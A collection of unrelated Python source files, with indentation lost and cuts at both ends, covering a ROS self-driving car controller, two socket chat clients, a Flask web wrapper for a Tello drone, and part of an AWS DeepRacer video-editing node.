lane_modes = ["Cla", "Adv", "Line"]
info = [str(cf.speed_offset), str(cf.max_addition_speed), lane_modes[cf.lane_mode], str(cf.is_record), str(int(cf.angle))]
text = texts[line]+info[line];
space = (14 - len(text))*" "
text +=space
set_lcd(text)
def get_ss_status(data):
set_led(not data.data)
if data.data is True:
time.sleep(1)
cf.pause2 = not data.data
else:
cf.pause2 = not data.data
time.sleep(0.1)
def get_bt1_status(data): #ngoai cung ben phai
if data.data and not cf.bt1_old:
cf.pause = not cf.pause
cf.bt1_old = data.data
time.sleep(0.1)
def get_bt2_status(data):
if data.data and not cf.bt2_old:
if cf.cursor == 0:
cf.speed_offset -= 1
if cf.cursor == 1:
cf.max_addition_speed -= 1
print_lcd(cf.cursor)
cf.bt2_old = data.data
time.sleep(0.1)
def get_bt3_status(data):
if data.data and not cf.bt3_old:
if cf.cursor == 0:
cf.speed_offset += 1
cf.pause = False
if cf.cursor == 1:
cf.max_addition_speed += 1
if cf.cursor == 2:
cf.lane_mode = (cf.lane_mode+1)%3
if cf.cursor == 3:
cf.is_record = not cf.is_record
if cf.cursor == 4:
cf.lane_mode = 1
time.sleep(0.5)
cf.angle_offset = - cf.angle0
cf.angle_y_offset = - cf.angle1+180
cf.angle_y_array = cf.angle_y_array*0
cf.finish = False
cf.go = False
print_lcd(cf.cursor)
cf.bt3_old = data.data
time.sleep(0.1)
def get_bt4_status(data):
if data.data and not cf.bt4_old:
cf.cursor = (cf.cursor+1)%5
print_lcd(cf.cursor)
cf.bt4_old = data.data
time.sleep(0.1)
cf.angle_offset = 0
cf.angle_y_offset = 0
def get_angle(data):
cf.angle0 = data.data
cf.angle = cf.angle0 + cf.angle_offset
if cf.angle<0:
cf.angle = 360 +cf.angle
def get_angle_y(data):
cf.angle1 = data.data
cf.angle_y = cf.angle1 + cf.angle_y_offset
if cf.angle_y>360:
cf.angle_y =cf.angle_y- 360
lech = cf.angle_y - cf.angle_y_checkpoint
if lech>180:
lech = 360 - lech
cf.angle_y_array = np.concatenate([cf.angle_y_array, [lech]])
cf.angle_y_array = cf.angle_y_array[1:]
cf.route =''
cf.old_route =''
def get_route_massage(data):
route_message = data.data
route_arr = route_message.split('-')
num = str(len(route_arr))
cf.route = num
for checkoint in route_arr:
cf.route = cf.route + " "+str(checkoint)
print "#"*20
print "Received new route message:", cf.route
if cf.route != cf.old_route:
cf.shortest_route = get_shortest_route(cf.route)
cf.lane_mode = 1
time.sleep(0.5)
cf.angle_offset = - cf.angle0
cf.angle_y_offset = - cf.angle1+180
cf.angle_y_array = cf.angle_y_array*0
cf.finish = False
cf.go = False
cf.old_route = cf.route
else:
print "This is old route Message"
def angle_control():
if cf.control_mode == 0:
angle = PID(cf.center- 240)
if cf.control_mode ==1:
angle = Fuzzy(cf.center - 240)
set_steer(angle)
def speed_control():
if cf.speed_mode == 0:
cf.speed = int(cf.speed_offset + cf.addition_speed_ratio*cf.max_addition_speed)
if cf.speed_mode == 1:
cf.speed = cf.dynamic_speed
set_speed(cf.speed)
# System Variables
cf.bt1_old =cf.bt2_old = cf.bt3_old = cf.bt4_old = False
cf.cursor = 0
cf.HEIGHT = 320
cf.WIDTH = 480
cf.is_record = False
cf.out = cv2.VideoWriter(path+'/output.avi', cv2.VideoWriter_fourcc(*'XVID'), 30.0, (cf.WIDTH, cf.HEIGHT))
cf.img = np.zeros((480, 320, 3), np.uint8)
cf.depth =np.zeros((240, 320), np.uint8)
cf.img_show = np.zeros((320, 480), np.uint8)
cf.img_show2 = np.zeros((320, 480), np.uint8)
cf.running = True
cf.pause = True
cf.pause2 = True
cf.syn = True
# Speed Variables
cf.speed = 0
cf.speed_mode = 0
cf.speed_offset = 18
cf.max_addition_speed = 2
cf.addition_speed_ratio = 0
cf.dynamic_speed = 0
#Lane Variables
cf.map = 0
cf.steer = 0
cf.center = 240
cf.side_tracking = 0
cf.control_mode = 1
cf.lane_mode = 0
cf.time_side = time.time()
cf.pos_cam_default = 20
cf.barrier = None
cf.time_barrier = time.time()
cf.distance_default = 55
cf.distance = cf.distance_default
cf.control_mode = 0
cf.lane_choice = 0
cf.x_distance_default = 70
cf.x_distance = 0
#cf.center_old = 0
# Navigator Global Variables
cf.finish = False
cf.angle = 0
cf.angle_y = 0
cf.angle1 = 0
cf.angle_checkpoint = cf.angle
cf.angle_y_checkpoint = 0
cf.time_bridge = time.time() - 100
cf.angle_y_array = np.zeros(10)
def get_center(img_):
img = img_.copy()
if cf.side_tracking == -1:
cv2.rectangle(img, (0, 0), (80, 80), (0, 0, 255), -1)
elif cf.side_tracking == 1:
cv2.rectangle(img, (400, 0), (480, 80), (0, 0, 255), -1)
else:
cv2.rectangle(img, (200, 0), (280, 80), (0, 0, 255), -1)
if cf.lane_mode == 1:
center = Advance_lane(img)
cf.center = center
cv2.circle(img, (cf.center, 250), 5, (0, 255, 0), -1)
cf.img_show = img
if cf.lane_mode == 0:
side_tracking = cf.side_tracking
if side_tracking == -1:
side_tracking = 0
img, img2, center= Classic(img, side_tracking, cf.lane_choice, cf.distance, cf.center, cf.x_distance)
if time.time()-cf.time_side < 0.075:
cf.center = 240 - 30*(1-2*side_tracking)
#cf.center_old = cf.center
else:
cf.center = center
cf.img_show = img
cf.img_show2 = img2
def speed_Prediction():
print("Speed_Prediction started!")
while cf.running:
cf.addition_speed_ratio = Speed_prediction(cf.img)
print("Speed_Prediction stoped!")
cf.time_fps = time.time()-1
cf.fps = 0
def main():
print("Main started!")
time.sleep(1)
set_lcd("0:0: ");time.sleep(0.2)
print_lcd(0);time.sleep(0.2)
print_lcd(1);time.sleep(0.2)
print_lcd(2);time.sleep(0.2)
print_lcd(3);time.sleep(0.2)
print_lcd(4);
while cf.running:
if cf.syn:
cf.fps = int(1/(time.time()-cf.time_fps))
cf.time_fps = time.time()
cf.syn = False
get_center(cf.img)
angle_control()
speed_control()
time_lcd = time.time()
def show():
global t_point_fps, time_lcd
print("Show_thread started !")
while cf.running:
font = cv2.FONT_HERSHEY_SIMPLEX
control_modes = ["Fuz", "PID"]
lane_modes = ["Cla", "Adv", "Line"]
img = cf.img_show.copy()
if cf.is_record:
cf.out.write(cf.img)
if cf.barrier == 0:
cv2.rectangle(img, (0, 80), (80, 160), (255, 0, 0), -1)
if cf.barrier == 1:
cv2.rectangle(img, (400, 80), (480, 160), (255, 0, 0), -1)
cv2.putText(img,"S: "+str(cf.speed),(90,25), font, 0.8, (255,0,0), 2, 1)
cv2.putText(img,str(int(cf.angle)),(350,25), font, 0.8, (255,0,0), 2, 1)
cv2.putText(img,str(int(cf.angle_checkpoint)),(250,25), font, 1, (255,0,0), 2, 1)
cv2.putText(img,str(cf.distance),(200,50), font, 0.8, (255,0,0), 2, 1)
cv2.putText(img,str(cf.pos_cam_default),(90,50), font, 0.8, (255,0,0), 2, 1)
cv2.putText(img,str(cf.lane_choice),(300,50), font, 0.8, (255,0,0), 2, 1)
cv2.putText(img,"REC: "+str(cf.is_record)+" "+ str(cf.fps),(90,75), font, 0.8, (255,0,0), 2, 1)
cv2.imshow("img", img)
#cv2.imshow("img2", cf.img_show2)
#cv2.imshow("cf.depth", cf.depth)
k = cv2.waitKey(30)
if k == ord('u'):
cf.distance_default +=5
if k == ord('i'):
cf.distance_default -=5
if k == ord('t'):
cf.max_addition_speed +=1
print_lcd(1)
if k == ord('g'):
cf.max_addition_speed -=1
print_lcd(1)
if k == ord('h'):
cf.pos_cam_default +=2
cf.pos_cam_pub.publish(-cf.pos_cam_default*cf.side_tracking)
if k == ord('j'):
cf.pos_cam_default -=2
cf.pos_cam_pub.publish(-cf.pos_cam_default*cf.side_tracking)
if k == ord('w'):
cf.speed_offset += 1
#cf.pause = False
print_lcd(0)
print (cf.speed)
if k == ord('s'):
cf.speed_offset -= 1
print_lcd(0)
print (cf.speed)
if k == 32:
cf.pause = True
if k == ord('p'):
cf.pause = False
if k == ord('m'):
print "#"*20
cf.map = 1-cf.map
cf.lane_mode = 1
time.sleep(0.5)
cf.angle_offset = - cf.angle0
cf.angle_y_offset = - cf.angle1+180
cf.angle_y_array = cf.angle_y_array*0
cf.finish = False
cf.go = False
if k == ord('r'):
cf.side_tracking += 1
if cf.side_tracking==2:
cf.side_tracking = -1
cf.time_side = time.time()
if cf.lane_mode == 0:
cf.pos_cam_pub.publish(-cf.pos_cam_default*cf.side_tracking)
else:
cf.pos_cam_pub.publish(0)
if k == ord('f'):
print "#"*20
reset_mpu()
time.sleep(0.5)
cf.lane_mode = 1
time.sleep(0.5)
cf.angle_offset = - cf.angle0
cf.angle_y_offset = - cf.angle1+180
cf.angle_y_array = cf.angle_y_array*0
cf.finish = False
cf.go = False
if k == ord('e'):
cf.control_mode = 1-cf.control_mode
print(cf.control_mode)
if k == ord('z'):
cf.lane_choice = (1+cf.lane_choice)%3
print(cf.lane_choice)
if k == ord('c'):
cf.lane_mode = 1-cf.lane_mode
if cf.lane_mode == 0:
cf.pos_cam_pub.publish(-cf.pos_cam_default*cf.side_tracking)
else:
cf.pos_cam_pub.publish(0)
print_lcd(2)
if k == ord('v'):
cf.is_record = not cf.is_record
print_lcd(3)
if k == ord('q'):
cf.speed = 0
cf.steer = 0
cf.finish = False
cf.running = False
cf.go = False
set_speed(cf.speed)
set_steer(cf.steer)
cf.pos_cam_pub.publish(0)
cf.out.release()
rospy.signal_shutdown("Bo may thich")
if time.time()-time_lcd > 1:
print_lcd(4)
time_lcd = time.time()
def listenner():
rospy.Subscriber("/ss_status", Bool, get_ss_status, queue_size=1)
rospy.Subscriber("/bt1_status", Bool, get_bt1_status, queue_size=1)
rospy.Subscriber("/bt2_status", Bool, get_bt2_status, queue_size=1)
rospy.Subscriber("/bt3_status", Bool, get_bt3_status, queue_size=1)
rospy.Subscriber("/bt4_status", Bool, get_bt4_status, queue_size=1)
rospy.Subscriber("/angle", Float32, get_angle, queue_size=1)
rospy.Subscriber("/angle_y", Float32, get_angle_y, queue_size=1)
rospy.Subscriber("/route", String, get_route_massage, queue_size=1)
rospy.spin()
get_rbg_thread = threading.Thread(name = "get_rbg_thread", target=get_rgb)
get_rbg_thread.start()
time.sleep(0.5)
get_depth_thread = threading.Thread(name = "get_depth_thread", target=get_depth)
#get_depth_thread.start()
main_thread = threading.Thread(name= "main_thread", target= main)
main_thread.start()
speed_thread = threading.Thread(name= "speed_Prediction", target= speed_Prediction)
speed_thread.start()
show_thread = threading.Thread(name= "show information", target= show)
show_thread.start()
navigator_thread = threading.Thread(name= "Navigator_thread", target = navigator)
navigator_thread.start()
listenner()
|
client2.py
|
#!/usr/bin/env python3
"""Script for Tkinter GUI chat client."""
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import tkinter
def receive():
"""Handles receiving of messages."""
while True:
try:
msg = client_socket.recv(BUFSIZ).decode("utf8")
msg_list.insert(tkinter.END, msg)
except OSError: # Possibly client has left the chat.
break
def send(event=None): # event is passed by binders.
"""Handles sending of messages."""
msg = my_msg.get()
my_msg.set("") # Clears input field.
client_socket.send(bytes(msg, "utf8"))
if msg == "{quit}":
client_socket.close()
top.quit()
def on_closing(event=None):
"""This function is to be called when the window is closed."""
my_msg.set("{quit}")
send()
top = tkinter.Tk()
top.title("Chatter")
messages_frame = tkinter.Frame(top)
my_msg = tkinter.StringVar() # For the messages to be sent.
my_msg.set("Type your messages here.")
scrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.
# Following will contain the messages.
msg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
entry_field = tkinter.Entry(top, textvariable=my_msg)
entry_field.bind("<Return>", send)
entry_field.pack()
send_button = tkinter.Button(top, text="Send", command=send)
send_button.pack()
top.protocol("WM_DELETE_WINDOW", on_closing)
#----Now comes the sockets part----
HOST = input('Enter host: ')
PORT = input('Enter port: ')
if not PORT:
PORT = 33000
else:
PORT = int(PORT)
BUFSIZ = 1024
ADDR = (HOST, PORT)
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect(ADDR)
receive_thread = Thread(target=receive)
receive_thread.start()
tkinter.mainloop() # Starts GUI execution.
|
client.py
|
import os
import socket
from threading import Thread
from queue import Queue
from time import sleep
from pickle import load, dump
from .utils import Message, Channel
HOST = "localhost"
PORT = 5500
HOME = os.path.expanduser("~")
class Client:
def __init__(self, name: str, message_queue: Queue = Queue()) -> None:
self.name = name
self.queue = message_queue
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.online = True
self.GUPSHUP_FOLDER = os.path.join(HOME, ".config", "gupshup")
self.CHAT_DATA = os.path.join(self.GUPSHUP_FOLDER, self.name)
self.setup_db()
def setup_db(self) -> None:
"""
Reads if an offline data is present,
if yes, then loads the offline data
"""
try:
os.mkdir(self.GUPSHUP_FOLDER)
except FileExistsError:
pass
try:
with open(self.CHAT_DATA, "rb") as f:
self.chats = load(f)
except FileNotFoundError:
self.chats = []
with open(self.CHAT_DATA, "wb") as f:
dump(self.chats, f)
self.start = len(self.chats)
def save_chats(self) -> None:
"""
Save the chats before closing the application
"""
with open(self.CHAT_DATA, "wb") as f:
dump(self.chats, f)
def send(self, message: Message) -> None:
try:
self.channel.send(message)
except BrokenPipeError:
self.try_reconnect()
def close_connection(self):
self.conn.close()
# self.channel.close()
def listen_from_server(self) -> None:
"""
Listens from server and add the messages to a working Queue
"""
while 1:
try:
data = self.channel.recv()
self.queue.put(data)
self.chats += (data,)
except EOFError:
self.queue.put(Message(action="connection_disable"))
while not self.try_reconnect():
pass
self.queue.put(Message(action="connection_enable"))
def try_reconnect(self):
"""
Try reconnect on a connection failure
"""
try:
self.conn.connect((HOST, PORT))
self.conn.sendall(self.name.encode())
self.channel.close()
self.channel = Channel(self.conn)
sleep(0.01)
self.conn.sendall("-1".encode())
return True
except ConnectionRefusedError:
return False
except OSError:
self.conn.close()
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return False
def start_connection(self):
try:
self.conn.connect((HOST, PORT))
self.conn.sendall(self.name.encode())
sleep(0.01) # A mild delay for non-mangled recieve
self.conn.sendall(str(self.start).encode())
self.channel = Channel(self.conn)
Thread(target=self.listen_from_server, daemon=True).start()
except ConnectionRefusedError:
print("Looks like the server is down :(")
exit()
|
index.py
|
from flask import Flask
import time
import socket
import threading
import traceback
app = Flask(__name__)
class Tello:
"""Wrapper to simply interactions with the Ryze Tello drone."""
def __init__(self, local_ip, local_port, imperial=True, command_timeout=10, tello_ip='192.168.10.1', tello_port=8889):
"""Binds to the local IP/port and puts the Tello into command mode.
Args:
local_ip (str): Local IP address to bind.
local_port (int): Local port to bind.
imperial (bool): If True, speed is MPH and distance is feet.
If False, speed is KPH and distance is meters.
command_timeout (int|float): Number of seconds to wait for a response to a command.
tello_ip (str): Tello IP.
tello_port (int): Tello port.
Raises:
RuntimeError: If the Tello rejects the attempt to enter command mode.
"""
self.abort_flag = False
self.command_timeout = command_timeout
self.imperial = imperial
self.response = None
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.tello_address = (tello_ip, tello_port)
self.socket.bind((local_ip, local_port))
self.receive_thread = threading.Thread(target=self._receive_thread)
self.receive_thread.daemon=True
self.receive_thread.start()
if self.send_command('command') != 'ok':
raise RuntimeError('Tello rejected attempt to enter command mode')
print(" *** Tello Initialised")
def __del__(self):
"""Closes the local socket."""
self.socket.close()
def _receive_thread(self):
"""Listens for responses from the Tello.
Runs as a thread, sets self.response to whatever the Tello last returned.
"""
while True:
try:
self.response, ip = self.socket.recvfrom(256)
except Exception:
break
def flip(self, direction):
"""Flips.
Args:
direction (str): Direction to flip, 'l', 'r', 'f', 'b', 'lb', 'lf', 'rb' or 'rf'.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.send_command('flip %s' % direction)
def get_battery(self):
"""Returns percent battery life remaining.
Returns:
int: Percent battery life remaining.
"""
battery = self.send_command('battery?')
try:
battery = int(battery)
except:
pass
return battery
def get_flight_time(self):
"""Returns the number of seconds elapsed during flight.
Returns:
int: Seconds elapsed during flight.
"""
flight_time = self.send_command('time?')
try:
flight_time = int(flight_time)
except:
pass
return flight_time
def get_speed(self):
"""Returns the current speed.
Returns:
int: Current speed in KPH or MPH.
"""
speed = self.send_command('speed?')
try:
speed = float(speed)
if self.imperial is True:
speed = round((speed / 44.704), 1)
else:
speed = round((speed / 27.7778), 1)
except:
pass
return speed
def land(self):
"""Initiates landing.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.send_command('land')
def move(self, direction, distance):
"""Moves in a direction for a distance.
This method expects meters or feet. The Tello API expects distances
from 20 to 500 centimeters.
Metric: .1 to 5 meters
Imperial: .7 to 16.4 feet
Args:
direction (str): Direction to move, 'forward', 'back', 'right' or 'left'.
distance (int|float): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
distance = float(distance)
if self.imperial is True:
distance = int(round(distance * 30.48))
else:
distance = int(round(distance * 100))
return self.send_command('%s %s' % (direction, distance))
def move_backward(self, distance):
"""Moves backward for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.move('back', distance)
def move_down(self, distance):
"""Moves down for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.move('down', distance)
def move_forward(self, distance):
"""Moves forward for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.move('forward', distance)
def move_left(self, distance):
"""Moves left for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.move('left', distance)
def move_right(self, distance):
"""Moves right for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
"""
return self.move('right', distance)
def move_up(self, distance):
"""Moves up for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.move('up', distance)
def send_command(self, command):
"""Sends a command to the Tello and waits for a response.
If self.command_timeout is exceeded before a response is received,
a RuntimeError exception is raised.
Args:
command (str): Command to send.
Returns:
str: Response from Tello.
Raises:
RuntimeError: If no response is received within self.timeout seconds.
"""
self.abort_flag = False
timer = threading.Timer(self.command_timeout, self.set_abort_flag)
self.socket.sendto(command.encode('utf-8'), self.tello_address)
timer.start()
while self.response is None:
if self.abort_flag is True:
raise RuntimeError('No response to command')
timer.cancel()
response = self.response.decode('utf-8')
self.response = None
return response
def set_abort_flag(self):
"""Sets self.abort_flag to True.
Used by the timer in Tello.send_command() to indicate to that a response
timeout has occurred.
"""
self.abort_flag = True
def set_speed(self, speed):
"""Sets speed.
This method expects KPH or MPH. The Tello API expects speeds from
1 to 100 centimeters/second.
Metric: .1 to 3.6 KPH
Imperial: .1 to 2.2 MPH
Args:
speed (int|float): Speed.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
speed = float(speed)
if self.imperial is True:
speed = int(round(speed * 44.704))
else:
speed = int(round(speed * 27.7778))
return self.send_command('speed %s' % speed)
def takeoff(self):
"""Initiates take-off.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
print(" *** Sending Takeoff command")
return self.send_command('takeoff')
def rotate_cw(self, degrees):
"""Rotates clockwise.
Args:
degrees (int): Degrees to rotate, 1 to 360.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.send_command('cw %s' % degrees)
def rotate_ccw(self, degrees):
"""Rotates counter-clockwise.
Args:
degrees (int): Degrees to rotate, 1 to 360.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.send_command('ccw %s' % degrees)
drone = Tello('192.168.10.3', 8889)
@app.route("/launch")
def launch():
print("Launching Drone")
#drone1 = Tello('192.168.10.3', 8889)
drone.takeoff()
drone.land()
return "Launching drone."
@app.route("/land")
def land():
print("Landing Drone")
#drone2 = Tello('192.168.10.3', 8889)
drone.land()
return "Landing drone."
@app.route("/")
def hello_world():
if drone is None:
print("No drone initialised")
return "Drone control on!"
|
agents_video_editor.py
|
#!/usr/bin/env python
##############################################################
# #
# Copyright 2019 Amazon.com, Inc. or its affiliates. #
# All Rights Reserved. #
# #
##############################################################
import sys
import time
import logging
from threading import Thread
import Queue
import cv2
import rospy
from std_srvs.srv import Empty
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import Image as ROSImg
from std_msgs.msg import String
from markov.utils import DoubleBuffer, force_list, get_video_display_name, get_racecar_names
from markov.constants import DEFAULT_COLOR
from markov.log_handler.logger import Logger
from markov.log_handler.exception_handler import log_and_exit
from markov.log_handler.constants import (SIMAPP_EVENT_ERROR_CODE_500,
SIMAPP_SIMULATION_KINESIS_VIDEO_CAMERA_EXCEPTION)
from markov.reset.constants import (RaceType)
from markov.rospy_wrappers import ServiceProxyWrapper
from markov.utils import get_racecar_idx
from deepracer_simulation_environment.srv import VideoMetricsSrvRequest, VideoMetricsSrv
from mp4_saving.constants import (CameraTypeParams,
Mp4Parameter, FrameQueueData, MAX_FRAMES_IN_QUEUE,
KVS_PUBLISH_PERIOD, QUEUE_WAIT_TIME, FrameTypes)
from mp4_saving.single_agent_image_editing import SingleAgentImageEditing
from mp4_saving.multi_agent_image_editing import MultiAgentImageEditing
from mp4_saving.training_image_editing import TrainingImageEditing
from mp4_saving.f1_image_editing import F1ImageEditing
from mp4_saving import utils
from mp4_saving.save_to_mp4 import SaveToMp4
LOG = Logger(__name__, logging.INFO).get_logger()
class AgentsVideoEditor(object):
""" This node is used to produce frames for the AWS kinesis video stream and
for saving the mp4 and uploading to S3. Both are subscribed to the output of
the image topic produced by this node.
"""
_agents_metrics = list()
_mp4_queue = list()
def __init__(self, racecar_name, racecars_info, is_publish_to_kvs_stream):
#
# We have no guarantees as to when gazebo will load the model, therefore we need
# to wait until the model is loaded and markov packages has spawned all the models
#
rospy.wait_for_service('/robomaker_markov_package_ready')
self._agents_metrics.append(DoubleBuffer(clear_data_on_get=False))
self.racecar_name = racecar_name
self.racecars_info = racecars_info
racecar_index = get_racecar_idx(racecar_name)
self.racecar_index = racecar_index if racecar_index else 0
self.agent_name = utils.racecar_name_to_agent_name(racecars_info, racecar_name)
self._is_publish_to_kvs_stream = is_publish_to_kvs_stream
# init cv bridge
self.bridge = CvBridge()
# This determines what kind of image editing should be done based on the race type
self.is_training = rospy.get_param("JOB_TYPE") == 'TRAINING'
self.race_type = rospy.get_param("RACE_TYPE", RaceType.TIME_TRIAL.value)
self.is_f1_race_type = self.race_type == RaceType.F1.value
#
# Two job types are required because in the F1 editing we have static variables
# to compute the gap and ranking. With Mp4 stacking frames, these values would be already updated by KVS.
# If same class is used then during the finish phase you see all the racers information at once
# and not updated real time when racers finish the lap.
# %TODO seperate out the kvs and Mp4 functionality
#
self.job_type_image_edit_mp4 = self._get_image_editing_job_type()
if self.is_training:
# String indicating the current phase
self._current_training_phase = DoubleBuffer(clear_data_on_get=False)
self._current_training_phase.put('Initializing')
# Subscriber to get the phase of the training (Ideal, training, evaluation)
rospy.Subscriber('/agent/training_phase', String, self._training_phase_cb)
# Fetching main camera frames, start consumer thread and producer thread for main camera frame
main_camera_topic = "/{}/{}/zed/rgb/image_rect_color".format(self.racecar_name, "main_camera")
# All Mp4 related initialization
self._mp4_queue.append(Queue.Queue())
# Initialize save mp4 ROS service for the markov package to signal when to
# start and stop collecting video frames
camera_info = utils.get_cameratype_params(self.racecar_name, self.agent_name, self.is_f1_race_type)
self.save_to_mp4_obj = SaveToMp4(camera_infos=[camera_info[CameraTypeParams.CAMERA_PIP_PARAMS],
camera_info[CameraTypeParams.CAMERA_45DEGREE_PARAMS],
camera_info[CameraTypeParams.CAMERA_TOPVIEW_PARAMS]],
fourcc=Mp4Parameter.FOURCC.value,
fps=Mp4Parameter.FPS.value,
frame_size=Mp4Parameter.FRAME_SIZE.value)
rospy.Service('/{}/save_mp4/subscribe_to_save_mp4'.format(self.racecar_name),
Empty, self.subscribe_to_save_mp4)
rospy.Service('/{}/save_mp4/unsubscribe_from_save_mp4'.format(self.racecar_name),
Empty, self.unsubscribe_to_save_mp4)
# Publish to save mp4 topic
self.mp4_main_camera_pub = rospy.Publisher('/{}/deepracer/main_camera_stream'.format(self.racecar_name), ROSImg,
queue_size=1)
# ROS service to get video metrics
rospy.wait_for_service("/{}/{}".format(self.agent_name, "mp4_video_metrics"))
self.mp4_video_metrics_srv = ServiceProxyWrapper("/{}/{}".format(self.agent_name, "mp4_video_metrics"),
VideoMetricsSrv)
self.is_save_mp4_enabled = False
# Only F1 race requires top camera frames edited
self.top_camera_mp4_pub = None
if self.is_f1_race_type and self.racecar_index == 0:
self._top_camera_frame_buffer = DoubleBuffer(clear_data_on_get=False)
top_camera_topic = "/sub_camera/zed/rgb/image_rect_color"
rospy.Subscriber(top_camera_topic, ROSImg, self._top_camera_cb)
self.top_camera_mp4_pub = rospy.Publisher('/{}/topcamera/deepracer/mp4_stream'.format(racecar_name),
ROSImg, queue_size=1)
self._main_camera_frame_buffer = DoubleBuffer(clear_data_on_get=False)
rospy.Subscriber(main_camera_topic, ROSImg, self._producer_frame_thread)
Thread(target=self._consumer_mp4_frame_thread).start()
# Leaderboard jobs do not require KVS streams
if self._is_publish_to_kvs_stream:
self.job_type_image_edit_kvs = self._get_image_editing_job_type()
# Publish to KVS stream topic
self.kvs_pub = rospy.Publisher('/{}/deepracer/kvs_stream'.format(self.racecar_name), ROSImg, queue_size=1)
Thread(target=self._kvs_publisher).start()
def subscribe_to_save_mp4(self, req):
""" Ros service handler function used to subscribe to the Image topic.
Arguments:
req (req): Dummy req else the ros service throws exception
Return:
[] - Empty list else ros service throws exception
"""
self.is_save_mp4_enabled = True
self.save_to_mp4_obj.subscribe_to_save_mp4()
return []
def unsubscribe_to_save_mp4(self, req):
""" Ros service handler function used to unsubscribe from the Image topic.
This will take care of cleaning and releasing the cv2 VideoWriter
Arguments:
req (req): Dummy req else the ros service throws exception
Return:
[] - Empty list else ros service throws exception
"""
self.is_save_mp4_enabled = False
# This is required because when unsubscribe call is made the frames in the queue will continue editing,
# but at this time the 45degree camera will continue to be subscribed and saved to mp4 which we do not want.
camera_topics_stop_immediately, camera_topics_stop_post_empty_queue = list(), list()
if not self.top_camera_mp4_pub:
camera_topics_stop_immediately = [CameraTypeParams.CAMERA_45DEGREE_PARAMS.value,
CameraTypeParams.CAMERA_TOPVIEW_PARAMS.value]
camera_topics_stop_post_empty_queue = [CameraTypeParams.CAMERA_PIP_PARAMS.value]
else:
camera_topics_stop_immediately = [CameraTypeParams.CAMERA_45DEGREE_PARAMS.value]
camera_topics_stop_post_empty_queue = [CameraTypeParams.CAMERA_TOPVIEW_PARAMS.value,
CameraTypeParams.CAMERA_PIP_PARAMS.value]
self.save_to_mp4_obj.unsubscribe_to_save_mp4(camera_topics_stop_immediately)
LOG.info("Waiting to flush the Mp4 queue for racecar_{}...".format(self.racecar_index))
while not self._mp4_queue[self.racecar_index].empty():
time.sleep(1)
LOG.info("Done flushing the Mp4 queue for racecar_{}...".format(self.racecar_index))
self.save_to_mp4_obj.unsubscribe_to_save_mp4(camera_topics_stop_post_empty_queue)
return []
def _top_camera_cb(self, frame):
'''Callback for the frames being publish by the top camera topic
frame - Frames, of type Image, being published by main camera topic
'''
self._top_camera_frame_buffer.put(frame)
def _training_phase_cb(self, phase):
""" Callback function that gives the training phase - Whether its in
evaluation, ideal, training, initializing
Args:
phase: [description]
"""
self._current_training_phase.put(phase.data)
def _get_image_editing_job_type(self):
""" This determines what kinding of image editing should be done based on the race type
Returns:
ImageEditingObj: Instantiating an object based on training/evaluation and racetype
"""
if self.is_training:
return TrainingImageEditing(self.racecar_name, self.racecars_info, self.race_type)
elif self.is_f1_race_type:
return F1ImageEditing(self.racecar_name, self.racecars_info, self.race_type)
elif self.race_type == RaceType.HEAD_TO_MODEL.value:
return MultiAgentImageEditing(self.racecar_name, self.racecars_info,
self.race_type)
elif self.race_type in [RaceType.TIME_TRIAL.value, RaceType.OBJECT_AVOIDANCE.value,
RaceType.HEAD_TO_BOT.value]:
return SingleAgentImageEditing(self.racecar_name, self.racecars_info, self.race_type)
raise Exception("Unknown job type for image editing")
def _update_racers_metrics(self):
""" Used to update the racers metric information
"""
if not rospy.is_shutdown():
video_metrics = self.mp4_video_metrics_srv(VideoMetricsSrvRequest())
self._agents_metrics[self.racecar_index].put(video_metrics)
def _edit_main_camera_images(self, frame_data, metric_info, is_mp4, edited_frame_result):
""" Thread to edit main camera frames
Args:
frame_data (dict): Dictionary of frame, agent_metric_info, training_phase
metric_info (dict): This contains metric information to edit the videos also the phase like training phase
is_mp4 (bool): Is this editing part of KVS or MP4
edited_frame_result (dict): A mutable variable holding the dict result of edited frame
"""
main_frame = frame_data[FrameQueueData.FRAME.value][FrameTypes.MAIN_CAMERA_FRAME.value]
major_cv_image = self.bridge.imgmsg_to_cv2(main_frame, "bgr8")
major_cv_image = cv2.cvtColor(major_cv_image, cv2.COLOR_RGB2RGBA)
# Edit the image based on the racecar type and job type
if is_mp4:
major_cv_image = self.job_type_image_edit_mp4.edit_image(major_cv_image, metric_info)
else:
major_cv_image = self.job_type_image_edit_kvs.edit_image(major_cv_image, metric_info)
edited_main_frame = self.bridge.cv2_to_imgmsg(major_cv_image, "bgr8")
edited_frame_result[FrameTypes.MAIN_CAMERA_FRAME.value] = edited_main_frame
def _edit_top_camera_images(self, frame_data, metric_info, edited_frame_result):
""" Thread to edit top camera frames. This is only for the F1 format
Args:
frame_data (dict): Dictionary of frame, agent_metric_info, training_phase
